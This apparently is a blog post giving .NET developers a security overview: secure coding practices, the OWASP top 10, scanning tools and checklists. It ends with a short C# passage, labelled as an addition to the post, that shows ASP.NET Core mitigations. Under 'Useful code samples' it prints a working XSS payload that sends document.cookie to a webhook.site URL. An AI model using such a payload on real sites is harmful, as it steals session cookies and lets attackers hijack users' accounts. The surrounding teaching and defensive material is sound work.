Software security for .Net developers
Mar 8, 2021
When and why should we think about security?
Secure Coding Practices
- Input Validation
- Output Encoding
- Authentication and Password Management
- Session Management
- Access Control
- Cryptographic Practices
- Error Handling and Logging
- Communication Security
- System Configuration
- Database Security
- File Management
- Memory Management
- General Coding Practices
OWASP top 10 for WEB
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
Weaknesses and vulnerabilities
What is the difference between a vulnerability and a weakness?
Weaknesses are errors that can lead to vulnerabilities.
Common Weakness Enumeration (CWE)
Common Vulnerabilities and Exposures (CVE)
Application security assessment tools
- sqlmap (open source, SQL injections)
- OWASP ZAP (open source, web app scanner)
- Burp Suite (community edition is free, exploring web security)
Analyze project dependencies
Platforms for practicing
Useful Checklists
- OWASP Application Security Verification Standard 4.0
- OWASP DotNet Security Cheat Sheet
- OWASP REST Security Cheat Sheet
- Transport Layer Protection Cheat Sheet
Useful links
Some useful terms you should know
- Symmetric vs. Asymmetric Encryption
- Use signature for request payload
- Denial of service (DoS)
- Brute force attack
- Spoofing
- Phishing
- Sanitization
Useful code samples
XSS to get cookie
<img src=x onerror=this.src='https://webhook.site/63dc6b4e-3f8f-468e-bb3e-9134e31c39da/?c='+document.cookie>
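The defender's side of the sample above, as an added example that is not part of the original post: an ASP.NET Core app that issues the session cookie with HttpOnly (so document.cookie cannot read it), HTML-encodes reflected input (so the img tag renders as text instead of executing), and sends a Content-Security-Policy that blocks both the inline onerror handler and the image request to a foreign origin. The /login and /greet routes, the session value and the .NET 6+ minimal API setup are assumptions for the example.

```csharp
// Added example (not from the original post): three mitigations for the
// cookie-stealing XSS payload shown above. Assumes ASP.NET Core on .NET 6+.
using System;
using System.Text.Encodings.Web;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Http;

var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();

// 1. Content-Security-Policy as defence in depth: without 'unsafe-inline'
//    the injected onerror handler does not run, and img-src 'self' stops the
//    browser from sending the cookie to webhook.site even if it did.
app.Use(async (ctx, next) =>
{
    ctx.Response.Headers["Content-Security-Policy"] =
        "default-src 'self'; script-src 'self'; img-src 'self'; connect-src 'self'";
    await next();
});

// 2. Session cookie flags: HttpOnly hides the value from document.cookie,
//    Secure limits it to HTTPS, SameSite=Strict keeps it off cross-site requests.
app.MapGet("/login", (HttpContext ctx) =>
{
    // "opaque-session-id-placeholder" stands in for a server-generated session id.
    ctx.Response.Cookies.Append("session", "opaque-session-id-placeholder", new CookieOptions
    {
        HttpOnly = true,
        Secure = true,
        SameSite = SameSiteMode.Strict,
        MaxAge = TimeSpan.FromMinutes(20)
    });
    return Results.Ok("logged in");
});

// 3. Output encoding: user input is HTML-encoded before it is reflected, so
//    "<img src=x onerror=...>" becomes "&lt;img src=x onerror=...&gt;".
app.MapGet("/greet", (string name) =>
{
    string safeName = HtmlEncoder.Default.Encode(name);
    return Results.Content($"<p>Hello, {safeName}</p>", "text/html");
});

app.Run();
```

Requesting /greet?name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E should show the tag as literal text; if it executes, the encoding step is being bypassed somewhere.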